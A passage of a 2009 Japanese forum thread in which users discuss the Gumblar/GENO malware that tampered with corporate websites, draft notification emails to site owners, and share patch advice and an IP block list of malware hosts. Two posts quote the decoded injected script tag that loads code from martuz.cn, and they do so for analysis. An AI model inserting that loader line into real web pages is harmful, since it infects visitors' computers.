ID:ilxyL7Fy0さん乙です
116:192.168.0.774
09/05/17 13:20:16 Sggs+C2i0
>>112
最初に小林製薬が感染したと同じウィルスと入れた方がインパクトがあるように思いますが
117:192.168.0.774
09/05/17 13:21:09 6zykGUMd0
>>109
文才ありますねー、それで送ってください
118:192.168.0.774
09/05/17 13:21:44 GRfaSwDkP
>>116
製薬会社がウィルスに感染したとかとんでもないしな
119:192.168.0.774
09/05/17 13:22:42 T9pTie3x0
>>113
いやー管理者っつっても名前だけで外に製作任せてるかもしれんしな
まずは読ませる事を考えて、実例と顧客に被害が及ぶ事を説明して
信憑性あるサイトでも貼り付けて対応はよくわかる人に任せた方がいいんじゃない
何通もそんなの着ても速攻でゴミ箱いきな予感
120:192.168.0.774
09/05/17 13:24:51 2KRNOGSH0
>>107
最近、いろいろな国内企業の公式サイトが 悪意の攻撃者に改竄されているのはご存知でしょうか?
先日も小林製薬のサイトも改竄されて、サイトを閲覧した一般のお客さんにウィルスが感染しました。
じつは・・・
みたいな切り出しでよいのでは?
対策法とかは、もしかしたら、その担当者がセキュリティーベンダーに相談するような方向の方が良いかもしれない。
尋ねられたら、知っている範囲で答えてあげればいいし。
それだと、イタズラに思われるかな?
121:192.168.0.774
09/05/17 13:25:33 5zpzhS0v0
>>120
なんかスパムメールみたいに見えるなぁ
どうしたもんかね
122:192.168.0.774
09/05/17 13:26:25 7TaPV4fL0
まさか、人に文を読ませるために考えることになるとは思わなかったなw
123:192.168.0.774
09/05/17 13:27:17 T9pTie3x0
アフェリみたいでうさんくさいwwwごめん(´・ω・`)
ちょっとスレから離れます。適当にがんがれw
俺は>>120路線でso-net張ってやって、
誰かに相談してねって方向が良いと思う
url貼っちゃうと感染してないPCで踏んじゃうかもね
124:192.168.0.774
09/05/17 13:27:52 ytTR6LEA0
新たな「Webウイルス」が猛威、感染被害が急増:ITpro
URLリンク(itpro.nikkeibp.co.jp)
正規サイトに感染広がる:新手のWebベースマルウェアが急拡大 - ITmedia エンタープライズ
URLリンク(www.itmedia.co.jp)
セキュリティ通信|セキュリティ関連ニュース バックナンバー
正規サイト改ざん(2) 薬事日報社が調査結果公表?改ざんの手口が明らかに
URLリンク(www.so-net.ne.jp)
セキュリティ通信|セキュリティ関連ニュース バックナンバー
正規サイト改ざん(3) ウイルスに感染しないための対策
URLリンク(www.so-net.ne.jp)
もし、メールを送るのなら、これもつけておくと吉かも。
125:192.168.0.774
09/05/17 13:27:59 rsI8zkAT0
>>121
スパム吹いた
もうそんな風にしかみえなくなったじゃないかw
126:192.168.0.774
09/05/17 13:29:09 77O8s7yk0
今までの流れをみてると、各自が自分でちゃんと対策するのに任せるしかないって気がするけどな。
127:192.168.0.774
09/05/17 13:29:42 0CtfCDPI0
>>111
unescape()して出てくるサイトの一覧ってどこにあるの?まとめサイト?
成美堂出版の改竄部分をunescape()したら martuz.cn が出たけど
<script src=//mar"+"tuz.cn/vid/?id="+j+"><\/script>
src=// なんて表記でちゃんとアクセスできるのかな? http: の部分を抜くのは何なんだ??
128:192.168.0.774
09/05/17 13:31:22 fQ7GRX9bO
>>121
典型的なスパム文だわな
初めに誰もが知ってる大手の名前を出して注意をひくところが
難しいねぇ
129:192.168.0.774
09/05/17 13:32:13 T9pTie3x0
御社のHPを拝見した所、ウイルスを検出しました。
HPが改変されています。
これは、現在流行っているウイルスの一種で、
HPを見るだけで感染してしまい、被害を拡大する恐れがあります。
こちらのso-netのリンクに詳細が書かれているので参考にしてください。
so−netのURL
ご対応の程、宜しくお願い申し上げます。
尚、ウイルスに関して現在判明している情報は以下の通りです。
まとめのURLか、セキュベンダーのURL
↑こんなんでどうでしょ
130:192.168.0.774
09/05/17 13:34:14 Sggs+C2i0
正規のプロバイダメールで出せばどうなのかな?
ヘッダを見たらスパムメールじゃない事が分かるし
131:192.168.0.774
09/05/17 13:35:58 77O8s7yk0
名前だしただけで信頼されるような大手が複数でこの問題を扱ってるのを示せるわけじゃないからなあ。
現状で個人ができることなんてたかが知れてるし、変なやる気出してマルチポストしまくるのはかえって問題だ。
ちゃんと説明できるやつが家族や友人の面倒みるくらいで十分じゃないか。
企業の面倒まで見切れない。
132:192.168.0.774
09/05/17 13:36:03 CRVJI+EQ0
一般人っぽく簡潔に書くのがいいんだろうな。やっぱり
133:192.168.0.774
09/05/17 13:36:15 T9pTie3x0
店舗のメアドに送るならヘッダすら見ないと思うし
製作した会社とか鯖缶宛てなら詳しい事書かないでも
まとめ見りゃわかるでしょ。一般的に見たら解らないものは拒否だから。
134:192.168.0.774
09/05/17 13:36:20 ilxyL7Fy0
わたしの主人がオオアリクイに〜(以下略) みたいなタイトルで送るとか。(余計にスパムだなw)
ま、冗談はさておき
1.HP管理者は気付いてすらいないのが殆どなので、読んでもらう必要がある
2.放置すると、ウイルス感染の二次被害の加害者になる危険があることを説明
3.よくわからないコードであるところの危険部分がどこだか指摘
(どの箇所に挿入されるか書いておくだけでいいかも?)
4.対処方法の説明。
まずはPCリカバリかOS再インストール→ftpパスワードを変更する→Webサーバーの中身を空にする
→感染していないファイルを再UP の順番で行なうように説明
5.参考情報として、該当ウイルスの情報や対策についてのまとめリンクをつけておく
(これを前に持ってくるか後に持ってくるかはどっちがいいんだろう?)
6.おまけとして念のために予防策の説明(は、押し付けがましいのでなくてもいいかも)
135:192.168.0.774
09/05/17 13:36:50 uL9xj+2n0
>>129
非常勤の親父「また迷惑メールか削除削除・・・」
136:192.168.0.774
09/05/17 13:36:57 K2sBx0VP0
上で誰かが書いてたか、お客さんを装った平易な文章のほうがいい気がする
「お宅のホームページ見てたらアンチウイルスソフトが警告を出したので、調べてみたら
ウイルスコードがしかけられているようでした。
(so-netURL)と同じものと思われます。
ホームページを見るだけで、お客のパソコンが感染する危険なウイルスです。
どうか今すぐ対策をとってください
(対策サイトURL)」
とかなんとか
137:192.168.0.774
09/05/17 13:37:27 Um/4qeYR0
【速報】虹裏感染の疑い
138:192.168.0.774
09/05/17 13:37:57 T9pTie3x0
>>135
あるなwww
ここまで簡単に書いてもそれなら
もうそれはしょうがないよ
GENOの担当者は結局無反応だったよね?
139:192.168.0.774
09/05/17 13:38:09 mJUiMCyk0
複数名から違う文章で送れば 対応してくれんかなあ
140:192.168.0.774
09/05/17 13:39:11 ilxyL7Fy0
7.閲覧者への事後報告と、感染の可能性の疑われる場合は、使用中のセキュリティソフトベンダーに
相談するように告知して欲しい、隠蔽されてしまうと、被害が拡大し、最終的にはその企業の信用が
落ちてしまう。…ということも伝えたいがどうしたもんか。
141:192.168.0.774
09/05/17 13:39:34 77O8s7yk0
メールちゃんと読んでくれるような管理者ならすでに問題を知っていて対策してるだろ。
2chのまとめだってどこまで信頼してもらえるか微妙だし、こちらの所属を明らかにして送るんでもなければスパム扱いで終わりだ。
142:192.168.0.774
09/05/17 13:39:58 T9pTie3x0
>>139
なんだ急に変なメール増えたな・・・削除削除(´・ω・)
レン鯖に連絡した方がいいんじゃね?
まぁ一軒潰した所で(ry
143:192.168.0.774
09/05/17 13:41:26 ilxyL7Fy0
HP管理者ではなく、そのIPを管理している業者(whoisで調べる)のabuse窓口に送って、
ISPもしくは、レンタルサーバー管理会社を経由して警告して貰うという手法もあるね。
144:192.168.0.774
09/05/17 13:43:33 um/XFnMU0
もうこれぐらい挑発的なので良いんじゃないか?
これ送って反応無ければ、たまたま見つけた人っぽく上のメール送ってやる感じで
貴社のホームページがGENOウィルスに感染し、現在加害者になっています。
数日中に貴社ホームページよりウィルスコードの除去がなされていない場合、
京都府警察ハイテク犯罪対策室へ連絡させていただきます。
p.s. 対策に関してはググレ
管理できないホームページなら閉鎖しろ糞管理人
145:192.168.0.774
09/05/17 13:44:37 T9pTie3x0
てめーこのやろー
ページ開いたらパソコンばっ壊れたじゃねーか
さっさとHP直しやがれ誠意ってなんですかねぃおおぅ?!
146:192.168.0.774
09/05/17 13:48:45 mJUiMCyk0
replica08■web■fc2■com/index■html
感染
147:192.168.0.774
09/05/17 13:49:06 +iVGXmeP0
・Adobe Flash Playerを更新
バージョンの確認 最新:10.0.22.87
URLリンク(www.adobe.com)
ダウンロード
URLリンク(get.adobe.com)
・(入れてる人は)Adobe Readerを9.1.1に更新し、Javascriptの実行を制限する
ダウンロード 9.1
URLリンク(get.adobe.com)
ダウンロード後、[ヘルプ]→[アップデートの有無をチェック]することで9.1.1にし、
[編集]→[環境設定]→<JavaScript>→<Acrobat JavaScriptを使用>のチェックを外し、[OK]
(´・ω・`)らんらん♪
148:192.168.0.774
09/05/17 13:49:47 T9pTie3x0
感染ってどうやって見つけてるの?
149:192.168.0.774
09/05/17 13:51:26 yMbOeyMJ0
>>147
(´・ω・`)らん豚帰れよ
150:192.168.0.774
09/05/17 13:54:23 RrqXiVyA0
avastとバスター2009の同居ってやっぱだめ?
151:192.168.0.774
09/05/17 13:55:57 iagHZf1s0
すまん、流れ読まずに投下
gnome氏のzlkon/gumblarサイトを参考に作ったんで防止策の一つとして貼っておく
・サーバがちょくちょく変わる性質なので今後の動向に注意
・一番上のmartuz.cnはNEW
・行頭の"HiPr-"はgnome氏が緊急(High Priority)と書いてるもの
・言うまでもないが、IP範囲最終決定とか使用は自己責任で
HiPr-NEW martuz.cn - 2009.05.16 (95.129.144.0/23) :95.129.144.0-95.129.145.255
HiPr- Botnet C&C by Gumblar - 2009.05.09 (78.109.16.0/20) :78.109.16.0-78.109.31.255
HiPr- gumblar relative 2009.05.07 (213.182.192.0/19) :213.182.192.0-213.182.223.255
HiPr- gumblar - 2009.05.02 (94.229.64.0/20) :94.229.64.0-94.229.79.255
Trojan Exploits (Regarding ZeuS) -- 2009.05.14 (206.44.0.0/16) :206.44.0.0-206.44.255.255
Malware Injection 2009.05.06 (91.211.64.0/23) :91.211.64.0-91.211.65.255
basesrv3.net - 2009.05.03 (91.212.41.0/24) :91.212.41.0-91.212.41.255
Malware Injection 2009.05.06 (91.212.65.0/24) :91.212.65.0-91.212.65.255
Trojan Exploits (Regarding ZeuS) -- 2009.05.14 (85.17.0.0/16) :85.17.0.0-85.17.255.255
autobestwestern.cn - 2009.05.13 (85.214.90.0/24) :85.214.90.0-85.214.90.255
gumblar via e-mail - 2009.05.12 (74.220.215.0/24) :74.220.215.0-74.220.215.255
zlkon another-type 2009.05.03 (212.117.160.0/19) :212.117.160.0-212.117.191.255
zlkon.lv -- 2009.04.05 (94.247.2.0/23) :94.247.2.0-94.247.3.255
152:192.168.0.774
09/05/17 13:57:46 77O8s7yk0
一般に、機能の衝突するセキュリティソフトを複数導入するのは推奨されない。
153:192.168.0.774
09/05/17 13:58:36 RrqXiVyA0
>>152
だよね
バスター常時待機でときたまavastで検索って感じがいいかな?
154:192.168.0.774
09/05/17 14:00:18 0CtfCDPI0
成美堂出版 → martuz.cn
<script src=//mar"+"tuz.cn/vid/?id="+j+"><\/script>
replica08■web■fc2■com → martuz.cn
<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>
意外と飛び先は少ないのかもしれん リストが無いならつくるかねぇ
155:192.168.0.774
09/05/17 14:00:38 2KRNOGSH0
俺スパマーになれんのか?あっはは。
>>146のIP 208.71.106.38
>>147
Adobe Readerってバージョン違いで共存できたっけ?
テンプレ的には Ver1〜Ver8とか使っている人は削除して ってのを途中に入れたほうがいいかもしれない。
しかし、IPA↓ 110番を語るには休みすぎ。
コンピュータウイルスの相談窓口としてコンピュータウイルス110番の電話を設けております。
届出の方法等、コンピュータウイルスに関連のあることは何でもご相談下さい。
受付時間:平日10:00〜12:00、13:30〜17:00
>>151
参考にさせてもらいます。
次ページ最新レス表示スレッドの検索類似スレ一覧話題のニュースおまかせリスト▼オプションを表示暇つぶし2ch
5115日前に更新/288 KB
担当:undef